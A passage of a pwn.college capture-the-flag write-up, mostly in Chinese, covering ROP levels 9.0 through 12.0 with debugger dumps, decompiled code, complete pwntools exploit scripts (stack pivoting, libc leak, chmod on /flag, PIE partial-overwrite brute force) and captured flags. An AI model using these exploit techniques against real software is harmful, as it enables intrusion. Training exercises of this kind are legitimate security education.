06:0030│     0x7fff4c2cfce8 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
07:0038│     0x7fff4c2cfcf0 ◂— 0x100400040 /* '@' */
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0         0x40129e __do_global_dtors_aux+30
   1         0x4016ab print_gadget+498
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
0x00000000004016ab in print_gadget ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  9
 RBX  0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
 RCX  0x7d78a471b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0
 RDI  0x7d78a47f8710 ◂— 0
 RSI  0x7d78a47f7643 (_IO_2_1_stdout_+131) ◂— 0x7f8710000000000a /* '\n' */
 R8   0x20710
 R9   7
 R10  0x27643840 ◂— 0
 R11  0x202
 R12  1
 R13  0
 R14  0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0
 R15  0
 RBP  0x4050a0 (stdout@@GLIBC_2.2.5) —▸ 0x7d78a47f75c0 (_IO_2_1_stdout_) ◂— 0xfbad2887
*RSP  0x7fff4c2cfcc0 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
*RIP  0x4016ab (print_gadget+498) ◂— leave
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
   0x4026b5 <challenge+482>               ret                                <__do_global_dtors_aux+29>
    ↓
   0x40129d <__do_global_dtors_aux+29>    pop    rbp     RBP => 0x4050a0 (stdout@@GLIBC_2.2.5)
   0x40129e <__do_global_dtors_aux+30>    ret                                <print_gadget+498>
    ↓
 ► 0x4016ab <print_gadget+498>            leave
   0x4016ac <print_gadget+499>            ret                                <0>
    ↓



─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fff4c2cfcc0 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
01:0008│     0x7fff4c2cfcc8 ◂— 0x14c2cfdf8
02:0010│     0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 0
03:0018│     0x7fff4c2cfcd8 —▸ 0x7d78a4634e08 ◂— mov edi, eax
04:0020│     0x7fff4c2cfce0 —▸ 0x7fff4c2cfd20 —▸ 0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0
05:0028│     0x7fff4c2cfce8 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
06:0030│     0x7fff4c2cfcf0 ◂— 0x100400040 /* '@' */
07:0038│     0x7fff4c2cfcf8 —▸ 0x4026b6 (main) ◂— endbr64
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0         0x4016ab print_gadget+498
   1              0x0
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
0x00000000004016ac in print_gadget ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  9
 RBX  0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'
 RCX  0x7d78a471b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0
 RDI  0x7d78a47f8710 ◂— 0
 RSI  0x7d78a47f7643 (_IO_2_1_stdout_+131) ◂— 0x7f8710000000000a /* '\n' */
 R8   0x20710
 R9   7
 R10  0x27643840 ◂— 0
 R11  0x202
 R12  1
 R13  0
 R14  0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 0
 R15  0
*RBP  0x7d78a47f75c0 (_IO_2_1_stdout_) ◂— 0xfbad2887
*RSP  0x4050a8 ◂— 0
*RIP  0x4016ac (print_gadget+499) ◂— ret
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
   0x4026b5 <challenge+482>               ret                                <__do_global_dtors_aux+29>
    ↓
   0x40129d <__do_global_dtors_aux+29>    pop    rbp     RBP => 0x4050a0 (stdout@@GLIBC_2.2.5)
   0x40129e <__do_global_dtors_aux+30>    ret                                <print_gadget+498>
    ↓
   0x4016ab <print_gadget+498>            leave
 ► 0x4016ac <print_gadget+499>            ret                                <0>
    ↓



─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x4050a8 ◂— 0
01:0008│     0x4050b0 (stdin@@GLIBC_2.2.5) —▸ 0x7d78a47f68e0 (_IO_2_1_stdin_) ◂— 0xfbad208b
02:0010│     0x4050b8 (completed) ◂— 0
... ↓        2 skipped
05:0028│     0x4050d0 (bp_) —▸ 0x7fff4c2cfca0 —▸ 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— ...
06:0030│     0x4050d8 (cv_) ◂— 0
07:0038│     0x4050e0 (data) ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0         0x4016ac print_gadget+499
   1              0x0
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> dist $rsp $1
0x4050a8->0x4150e0 is 0x10038 bytes (0x2007 words)
pwndbg> x/10gx $1
0x4150e0 <data+65536>: 0x000000000040129d 0x00000000004050a0
0x4150f0 <data+65552>: 0x00000000004016ab 0x0000000000000000
0x415100 <data+65568>: 0x0000000000000000 0x0000000000000000
0x415110 <data+65584>: 0x0000000000000000 0x0000000000000000
0x415120 <data+65600>: 0x0000000000000000 0x0000000000000000

通过上面的调试我们知道，执行完栈迁移后应该返回到 elf.bss() + 0x10038 + 0x18 处继续执行，+ 0x18 是为了跳过执行栈迁移的三条指令。

那么接下来就好办了，思路可以参考 Level 8。既然我们已经有了更大的栈空间存放 gadgets，那接下来就只要泄漏 libc 基地址，调用 chmod 就好了。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    os,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level9.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *challenge+409
b *challenge+482
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(stage, leaked_addr=None):
    rop = ROP(elf)
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

    pop_rbp_ret = rop.rbp.address
    leavel_ret = rop.leave.address
    pop_rdi_ret = rop.rdi.address
    pop_rsi_pop_r15_ret = rop.find_gadget(["pop rsi", "pop r15", "ret"]).address

    gadgets_offset = 0x10038 + 0x18

    if stage == 1:
        payload = flat(
            pop_rbp_ret,
            elf.bss() + gadgets_offset,
            leavel_ret,
            pop_rdi_ret,
            elf.got["puts"],
            elf.plt["puts"],
            elf.symbols["_start"],
        )

        return payload
    elif stage == 2:
        libc.address = leaked_addr - libc.symbols["puts"]

        filename = next(elf.search(b"GNU"))
        mode = 0o4

        payload = flat(
            pop_rbp_ret,
            elf.bss() + gadgets_offset,
            leavel_ret,
            pop_rdi_ret,
            filename,
            pop_rsi_pop_r15_ret,
            mode,
            b"".ljust(0x8, b"A"),
            libc.symbols["chmod"],
        )

        return payload
    else:
        log.error("Incorrect stage number!")


def leak(target):
    target.recvuntil(b"Leaving!\x0a")

    return int.from_bytes(target.recv(0x6), "little")


def attack(target, payload):
    try:
        os.system("ln -s /flag GNU")

        send_payload(target, payload)

        payload = construct_payload(2, leak(target))

        send_payload(target, payload)

        target.recvall(timeout=3)

        try:
            with open("/flag", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload(1)

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{8pCSQF9tTLebDaqobUsXUt7T1Yp.01N1MDL5cTNxgzW}

Level 9.1

Information

Category: Pwn

Description

Perform a stack pivot to gain control flow!

Write-up

参见 Level 9.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    os,
    process,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level9.1"
HOST, PORT = "localhost", 1337

gdbscript = """
b *challenge+78
b *challenge+97
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(stage, leaked_addr=None):
    rop = ROP(elf)
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

    pop_rbp_ret = rop.rbp.address
    leavel_ret = rop.leave.address
    pop_rdi_ret = rop.rdi.address
    pop_rsi_pop_r15_ret = rop.find_gadget(["pop rsi", "pop r15", "ret"]).address

    gadgets_offset = 0x10018 + 0x18

    if stage == 1:
        payload = flat(
            pop_rbp_ret,
            elf.bss() + gadgets_offset,
            leavel_ret,
            pop_rdi_ret,
            elf.got["puts"],
            elf.plt["puts"],
            elf.symbols["_start"],
        )

        return payload
    elif stage == 2:
        libc.address = leaked_addr - libc.symbols["puts"]

        filename = next(elf.search(b"GNU"))
        mode = 0o4

        payload = flat(
            pop_rbp_ret,
            elf.bss() + gadgets_offset,
            leavel_ret,
            pop_rdi_ret,
            filename,
            pop_rsi_pop_r15_ret,
            mode,
            b"".ljust(0x8, b"A"),
            libc.symbols["chmod"],
        )

        return payload
    else:
        log.error("Incorrect stage number!")


def leak(target):
    target.recvuntil(b"Leaving!\x0a")

    return int.from_bytes(target.recv(0x6), "little")


def attack(target, payload):
    try:
        os.system("ln -s /flag GNU")

        send_payload(target, payload)

        payload = construct_payload(2, leak(target))

        send_payload(target, payload)

        target.recvall(timeout=3)

        try:
            with open("/flag", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload(1)

        if attack(target, payload):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{8cUj1kJEP7UIyfDvbSd34M8nJI-.0FO1MDL5cTNxgzW}

Level 10.0

Information

Category: Pwn

Description

Perform a partial overwrite to call the win function.

Write-up

int __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  _QWORD v4[3]; // [rsp+0h] [rbp-A0h] BYREF
  int v5; // [rsp+1Ch] [rbp-84h]
  void *dest[15]; // [rsp+20h] [rbp-80h] BYREF
  int v7; // [rsp+9Ch] [rbp-4h]
  __int64 savedregs; // [rsp+A0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+A8h] [rbp+8h] BYREF

  v5 = a1;
  v4[2] = a2;
  v4[1] = a3;
  puts(
    "This challenge reads in some bytes, overflows its stack, and allows you to perform a ROP attack. Through this series of");
  puts("challenges, you will become painfully familiar with the concept of Return Oriented Programming!\n");
  memset(dest, 0, 0x70uLL);
  sp_ = (__int64)v4;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v4) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts(
    "PIE is turned on! This means that you do not know where any of the gadgets in the main binary are. However, you can do a");
  puts(
    "partial overwrite of the saved instruction pointer in order to execute 1 gadget! If that saved instruction pointer goes");
  puts(
    "to libc, you will need to ROP from there. If that saved instruction pointer goes to the main binary, you will need to");
  puts(
    "ROP from there. You may need need to execute your payload several times to account for the randomness introduced. This");
  puts("might take anywhere from 0-12 bits of bruteforce depending on the scenario.\n");
  puts("In this challenge, a pointer to the win function is stored on the stack.");
  printf("That pointer is stored at %p, %d bytes before your input buffer.\n", dest, 8);
  puts("If you can pivot the stack to make the next gadget run be that win function, you will get the flag!\n");
  puts("ASLR means that the address of the stack is not known,");
  puts("but I will simulate a memory disclosure of it.");
  puts("By knowing where the stack is, you can now reference data");
  puts("that you write onto the stack.");
  puts("Be careful: this data could trip up your ROP chain,");
  puts("because it could be interpreted as return addresses.");
  puts("You can use gadgets that shift the stack appropriately to avoid that.");
  printf("[LEAK] Your input buffer is located at: %p.\n\n", &dest[1]);
  dest[0] = mmap(0LL, 0x138uLL, 3, 34, 0, 0LL);
  memcpy(dest[0], sub_2760, 0x138uLL);
  if ( mprotect(dest[0], 0x138uLL, 5) )
    __assert_fail("mprotect(data.win_addr, 0x138, PROT_READ|PROT_EXEC) == 0", "<stdin>", 0xA0u, "challenge");
  printf("The win function has just been dynamically constructed at %p.\n", dest[0]);
  v7 = read(0, &dest[1], 0x1000uLL);
  printf("Received %d bytes! This is potentially %d gadgets.\n", v7, ((unsigned __int64)&dest[1] + v7 - rp_) >> 3);
  puts("Let's take a look at your chain! Note that we have no way to verify that the gadgets are executable");
  puts("from within this challenge. You will have to do that by yourself.");
  print_chain(rp_, (unsigned int)(((unsigned __int64)&dest[1] + v7 - rp_) >> 3) + 1);
  return puts("Leaving!");
}

signed __int64 sub_2760()
{
  signed __int64 v0; // rax
  char v2[264]; // [rsp+0h] [rbp-108h] BYREF

  *(_QWORD *)v2 = 0x67616C662FLL;
  v0 = sys_open(v2, 0, 0);
  return sys_write(1u, v2, sys_read(v0, v2, 0x100uLL));
}

标绿的部分把 sub_2760 的地址映射到了 dest[0]，并设置为 r-x，read 可以覆盖返回地址，但这个程序开启了 PIE，我们需要通过部分写绕过它，执行 dest[0] 处保存的 sub_2760。

比如我们知道一个 gadget 是 0x0000000000001313 : pop rbp ; ret，因为有 PIE 所以我们只能得到它的偏移 0x313，调试验证一下在已知页地址的情况下利用这个偏移得到的是否是 pop rbp ; ret 这个 gadget：

Breakpoint 1, 0x000058bfb2ecdaf6 in challenge ()
------- tip of the day (disable with set show-tips off) -------
Pwndbg sets the SIGLARM, SIGBUS, SIGPIPE and SIGSEGV signals so they are not passed to the app; see info signals for full GDB signals configuration
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  9
 RBX  0x7ffe804c46d8 —▸ 0x7ffe804c6633 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level10.0'
 RCX  0x77b50a11b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0
 RDI  0x77b50a1f8710 ◂— 0
 RSI  0x77b50a1f7643 (_IO_2_1_stdout_+131) ◂— 0x1f8710000000000a /* '\n' */
 R8   0x58bfc6494010 ◂— 0
 R9   7
 R10  0x58bfc64942a0 ◂— 0x58bfc6494
 R11  0x202
 R12  1
 R13  0
 R14  0x77b50aae8000 (_rtld_global) —▸ 0x77b50aae92e0 —▸ 0x58bfb2ecc000 ◂— 0x10102464c457f
 R15  0
 RBP  0x4141414141414141 ('AAAAAAAA')
 RSP  0x7ffe804c4588 —▸ 0x58bfb2ecdb9c (main+165) ◂— lea rdi, [rip + 0xd98]
 RIP  0x58bfb2ecdaf6 (challenge+703) ◂— ret
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x58bfb2ecdaf6 <challenge+703>         ret                                <main+165>
    ↓
   0x58bfb2ecdb9c <main+165>              lea    rdi, [rip + 0xd98]     RDI => 0x58bfb2ece93b ◂— '### Goodbye!'
   0x58bfb2ecdba3 <main+172>              call   puts@plt                    <puts@plt>

   0x58bfb2ecdba8 <main+177>              mov    eax, 0                  EAX => 0
   0x58bfb2ecdbad <main+182>              leave
   0x58bfb2ecdbae <main+183>              ret

   0x58bfb2ecdbaf                         nop
   0x58bfb2ecdbb0 <__libc_csu_init>       endbr64
   0x58bfb2ecdbb4 <__libc_csu_init+4>     push   r15
   0x58bfb2ecdbb6 <__libc_csu_init+6>     lea    r15, [rip + 0x2173]     R15 => 0x58bfb2ecfd30 (__init_array_start) —▸ 0x58bfb2ecd320 (frame_dummy) ◂— endbr64
   0x58bfb2ecdbbd <__libc_csu_init+13>    push   r14
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffe804c4588 —▸ 0x58bfb2ecdb9c (main+165) ◂— lea rdi, [rip + 0xd98]
01:0008│     0x7ffe804c4590 ◂— 0
02:0010│     0x7ffe804c4598 —▸ 0x7ffe804c46e8 —▸ 0x7ffe804c6669 ◂— 'MOTD_SHOWN=pam'
03:0018│     0x7ffe804c45a0 —▸ 0x7ffe804c46d8 —▸ 0x7ffe804c6633 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level10.0'
04:0020│     0x7ffe804c45a8 ◂— 0x1804c46d8
05:0028│     0x7ffe804c45b0 —▸ 0x7ffe804c4650 —▸ 0x7ffe804c46b0 ◂— 0
06:0030│     0x7ffe804c45b8 —▸ 0x77b50a034e08 ◂— mov edi, eax
07:0038│     0x7ffe804c45c0 —▸ 0x7ffe804c4600 —▸ 0x77b50aae8000 (_rtld_global) —▸ 0x77b50aae92e0 —▸ 0x58bfb2ecc000 ◂— ...
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x58bfb2ecdaf6 challenge+703
   1   0x58bfb2ecdb9c main+165
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/2i 0x58bfb2ecd313
   0x58bfb2ecd313 <__do_global_dtors_aux+51>: pop    rbp
   0x58bfb2ecd314 <__do_global_dtors_aux+52>: ret

嗯，看来猜想没问题，那么盲猜页地址加覆盖低三 nibbles 就可以调用我们的 gadgets 了。

知道了怎么调用 gadgets，还需要思考整体攻击思路。我们有一个已泄漏的栈地址，把这个地址减八就是保存 sub_2760 函数的地址的地址了，我们可以通过栈迁移把 rsp 设置为泄漏的地址减十六，这样 ret 就执行 sub_2760 了。

我本想这样做，勿喷……：

payload = padding_to_ret
payload += flat(
    pop_rbp_ret_fixed_offset + random.choice(pop_rbp_ret_possible_bytes),
    pop_rbp_ret,
    leaked_addr,
    leave_ret_fixed_offset + random.choice(leave_ret_possible_bytes),
)

后来发现低 3 nibbles 覆盖了后 pop_rbp_ret 什么的会接着覆盖别的，所以这么做行不通。后来我意识到 rbp 在 rip 之前，提前设置好它不就完了？

需要注意的是 leave ; ret 到底要 pop 什么以及 ret 到哪里：

pwndbg> x/10gx 0x7ffd39e82968-0x10
0x7ffd39e82958: 0x00000001bee9a191 0x00007873bf78b000
0x7ffd39e82968: 0x4141414141414141 0x4141414141414141
0x7ffd39e82978: 0x4141414141414141 0x4141414141414141
0x7ffd39e82988: 0x4141414141414141 0x4141414141414141
0x7ffd39e82998: 0x4141414141414141 0x4141414141414141

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    p8,
    process,
    random,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level10.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *challenge+703
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(leaked_addr):
    rop = ROP(elf)

    padding_to_rbp = b"".ljust(0x78, b"A")

    leave_ret = rop.leave.address

    leave_ret_fixed_low_byte = p8(leave_ret & 0xFF)
    leave_ret_fixed_high_nibble = (leave_ret >> 0x8) & ~(1 << 4)
    leave_ret_possible_high_bytes = [
        p8(leave_ret_fixed_high_nibble + i) for i in range(0x00, 0x100, 0x10)
    ]

    payload = padding_to_rbp
    payload += flat(
        leaked_addr - 0x10,
        leave_ret_fixed_low_byte + random.choice(leave_ret_possible_high_bytes),
    )

    return payload


def leak(target):
    target.recvuntil(b"located at: ")

    return int(target.recv(0xE), 16)


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    while True:
        try:
            target = launch(debug=False)
            payload = construct_payload(leak(target))

            if attack(target, payload):
                exit()
        except Exception as e:
            log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{g4EQhfj4W4pI_g9tDdWlqPAdtK2.0VO1MDL5cTNxgzW}

Level 10.1

Information

Category: Pwn

Description

Perform a partial overwrite to call the win function.

Write-up

参见 Level 10.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    p8,
    process,
    random,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level10.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(leaked_addr):
    rop = ROP(elf)

    padding_to_rbp = b"".ljust(0x78, b"A")

    leave_ret = rop.leave.address

    leave_ret_fixed_low_byte = p8(leave_ret & 0xFF)
    leave_ret_fixed_high_nibble = (leave_ret >> 0x8) & ~(1 << 4)
    leave_ret_possible_high_bytes = [
        p8(leave_ret_fixed_high_nibble + i) for i in range(0x00, 0x100, 0x10)
    ]

    payload = padding_to_rbp
    payload += flat(
        leaked_addr - 0x10,
        leave_ret_fixed_low_byte + random.choice(leave_ret_possible_high_bytes),
    )

    return payload


def leak(target):
    target.recvuntil(b"located at: ")

    return int(target.recv(0xE), 16)


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    while True:
        try:
            target = launch(debug=False)
            payload = construct_payload(leak(target))

            if attack(target, payload):
                exit()
        except Exception as e:
            log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{kq62r2gqRuS8CCZ5IsBJ4-OK_E-.0FM2MDL5cTNxgzW}

Level 11.0

Information

Category: Pwn

Description

Perform a partial overwrite to call the win function.

Write-up

一眼题目结构和上题类似？好像没有区别吧……

看看，好的思路和 exp 是可以拿来反复秒题的 LMAO

唯有一点我不太懂，你这是何必呢？

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    p8,
    process,
    random,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level11.0"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(leaked_addr):
    rop = ROP(elf)

    padding_to_rbp = b"".ljust(0x88, b"A")

    leave_ret = rop.leave.address

    leave_ret_fixed_low_byte = p8(leave_ret & 0xFF)
    leave_ret_fixed_high_nibble = (leave_ret >> 0x8) & ~(1 << 4)
    leave_ret_possible_high_bytes = [
        p8(leave_ret_fixed_high_nibble + i) for i in range(0x00, 0x100, 0x10)
    ]

    payload = padding_to_rbp
    payload += flat(
        leaked_addr - 0x10,
        leave_ret_fixed_low_byte + random.choice(leave_ret_possible_high_bytes),
    )

    return payload


def leak(target):
    target.recvuntil(b"located at: ")

    return int(target.recv(0xE), 16)


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    while True:
        try:
            target = launch(debug=False)
            payload = construct_payload(leak(target))

            if attack(target, payload):
                exit()
        except Exception as e:
            log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{ogFd_c22L6ok_8m23oykWyxLfn9.0VM2MDL5cTNxgzW}

Level 11.1

Information

Category: Pwn

Description

Perform a partial overwrite to call the win function.

Write-up

参见 Level 10。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    p8,
    process,
    random,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level11.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(leaked_addr):
    rop = ROP(elf)

    padding_to_rbp = b"".ljust(0x38, b"A")

    leave_ret = rop.leave.address

    leave_ret_fixed_low_byte = p8(leave_ret & 0xFF)
    leave_ret_fixed_high_nibble = (leave_ret >> 0x8) & ~(1 << 4)
    leave_ret_possible_high_bytes = [
        p8(leave_ret_fixed_high_nibble + i) for i in range(0x00, 0x100, 0x10)
    ]

    payload = padding_to_rbp
    payload += flat(
        leaked_addr - 0x10,
        leave_ret_fixed_low_byte + random.choice(leave_ret_possible_high_bytes),
    )

    return payload


def leak(target):
    target.recvuntil(b"located at: ")

    return int(target.recv(0xE), 16)


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    while True:
        try:
            target = launch(debug=False)
            payload = construct_payload(leak(target))

            if attack(target, payload):
                exit()
        except Exception as e:
            log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{oSzRHWf3oNfOmzKglfN7pBOGmyY.0lM2MDL5cTNxgzW}

Level 12.0

Information

Category: Pwn

Description

Creatively apply stack pivoting to call the win function.

Write-up

~根据 Description，我们可以推测出 CuB3y0nd 是一位非常有 Creativity 的 Hacker，直接复用 Level 10 的 exp 秒了 Level 11 和 Level 12。每道题修改 exp 不超过 4 bytes~

写完一看 WTF! 这次 exp 跑了那么久没跑通……BRO MAKES ME SO MAD……~你一定没看见上面那句话吧，你肯定看不见……~

让我看看到底是怎么个事：

λ ~/Projects/pwn.college/ ROPgadget --binary babyrop_level12.0 --re "leave"
Gadgets information
============================================================
0x00000000000022b2 : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret
0x00000000000022b4 : add byte ptr [rax], al ; leave ; ret
0x000000000000171e : leave ; ret
0x00000000000022b1 : mov eax, 0 ; leave ; ret
0x000000000000178b : nop ; leave ; ret

Unique gadgets found: 5

Breakpoint 1, 0x00005978a812a2b7 in main ()
------- tip of the day (disable with set show-tips off) -------
Use the spray command to spray memory with cyclic pattern or specified value
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
